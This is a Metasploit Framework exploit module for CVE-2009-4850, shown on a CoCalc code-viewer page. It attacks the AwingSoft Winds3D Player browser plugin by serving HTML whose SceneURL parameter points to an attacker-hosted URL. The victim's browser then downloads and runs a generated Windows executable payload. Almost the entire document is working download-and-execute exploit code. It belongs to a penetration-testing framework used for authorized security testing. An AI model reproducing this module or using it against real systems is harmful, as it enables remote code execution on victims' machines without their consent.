CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
Views: 11784
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpServer::HTML
10
include Msf::Exploit::EXE
11
12
def initialize(info = {})
13
super(update_info(info,
14
'Name' => 'AwingSoft Winds3D Player 3.5 SceneURL Download and Execute',
15
'Description' => %q{
16
This module exploits an untrusted program execution vulnerability within the
17
Winds3D Player from AwingSoft. The Winds3D Player is a browser plugin for
18
IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL'
19
parameter to the URL to an executable, an attacker can execute arbitrary
20
code.
21
22
Testing was conducted using plugin version 3.5.0.9 for Firefox 3.5 and
23
IE 8 on Windows XP SP3.
24
},
25
'License' => MSF_LICENSE,
26
'Author' =>
27
[
28
'jduck' # original discovery & metasploit module
29
],
30
'References' =>
31
[
32
[ 'CVE', '2009-4850' ],
33
[ 'OSVDB', '60049' ]
34
],
35
'Payload' =>
36
{
37
'Space' => 2048,
38
'StackAdjustment' => -3500,
39
},
40
'Platform' => 'win',
41
'Targets' =>
42
[
43
[ 'Automatic', { }],
44
],
45
'DisclosureDate' => '2009-11-14',
46
'DefaultTarget' => 0))
47
end
48
49
def on_request_uri(cli, request)
50
51
payload_url = "http://"
52
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
53
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
54
55
if (request.uri.match(/payload/))
56
return if ((p = regenerate_payload(cli)) == nil)
57
data = generate_payload_exe({ :code => p.encoded })
58
print_status("Sending EXE payload")
59
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
60
61
# Handle the payload
62
# handler(cli)
63
return
64
end
65
66
# otherwise, send the html..
67
html = %Q|<html>
68
<body>
69
<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903'
70
codebase='http://www.awingsoft.com/zips/WindsPly.CAB'>
71
<param name="SceneURL" value="#{payload_url}#">
72
<embed type="application/x-awingsoft-winds3d" src="#{payload_url}">
73
</object>
74
|
75
76
print_status("Sending #{self.name} HTML")
77
# Transmit the compressed response to the client
78
send_response(cli, html, { 'Content-Type' => 'text/html' })
79
80
end
81
end
82
83